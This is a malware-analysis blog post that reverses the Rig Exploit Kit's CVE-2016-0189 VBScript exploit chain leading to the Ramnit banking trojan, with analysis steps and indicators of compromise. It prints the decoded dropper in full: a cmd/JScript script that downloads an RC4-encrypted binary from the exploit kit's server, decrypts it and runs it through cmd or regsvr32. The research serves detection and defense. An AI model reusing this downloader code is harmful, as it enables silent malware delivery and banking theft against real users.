Let’s Learn: In-Depth Reversing Rig Exploit Kit’s VBScript Memory Corruption (CVE-2016-0189)

Goal: Reverse the latest exploit payload (CVE-2016-0189) from the Rig Exploit Kit (RigEK) and its chain leading to Ramnit banker based on the user-agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).
Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin



The observed URI parameters are from thee RigEK URI 81.177[.140.137 (AS8342 RTCOMM-AS, RU):

  • NjA0MjE0/NDg3NDE4
  • mano
  • pano
  • gift
  • work
Background
While investigating the Rig EK observed its served exploit CVE-2016-0189 (VBScript Memory Corruption) based on the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit was serving the Rig EK CVE-2015-8651 Adobe Flash exploit based on the same user-agent string.

Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in Web-Developer plugin by setting up the breakpoint on bx or return and copying the decoded payload.


(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the Github CVE-2016-0189 page (minus a few variable changes and change ShellExecute to Run functions for obfuscation purposes). In this matter, CVE-2016-0186 is also known as  “Scripting Engine Memory Corruption Vulnerability.”


(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.

The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded beatified cmd command that downloads an encoded binary, decrypts, and runs the Ramnit banker as follows:


cmd.exe / q / c cd / d “%tmp%” && echo

function O(l) {
    var w = “pow”,
        j = 4 * 9;
    return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};

function V(k) {
    var y = a(e + “.” + e + “Request.5.1”);
    y.setProxy(n);
    y.open(“GET”, k(1), 1);
    y.Option(n) = k(2);
    y.send();
    y.WaitForResponse();
    if (200 == y.status) return _(y.responseText, k(n))
};

function _(k, e) {
    for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
    for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
    for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
    return q.join(“”)
};
try {
    u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
    P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
    s.Type = 3 – 1;
    s.Charset = “iso-8859-1”;
    s.Open();
    try {
        v = V(m)
    } catch (W) {
        v = V(m)
    };
    d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
    s.WriteText(v);
    h = “dll”;
    if (31 ^ < d) {
        var z = 1;
        x += h
    } else x += p;
    s.savetofile(x, 2);
    s.Close();
    C = ” /c “;
    Y = “gsvr32”;
    z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
    j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


The shortened relevant function is as follows (commented):

start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)”http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker 
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s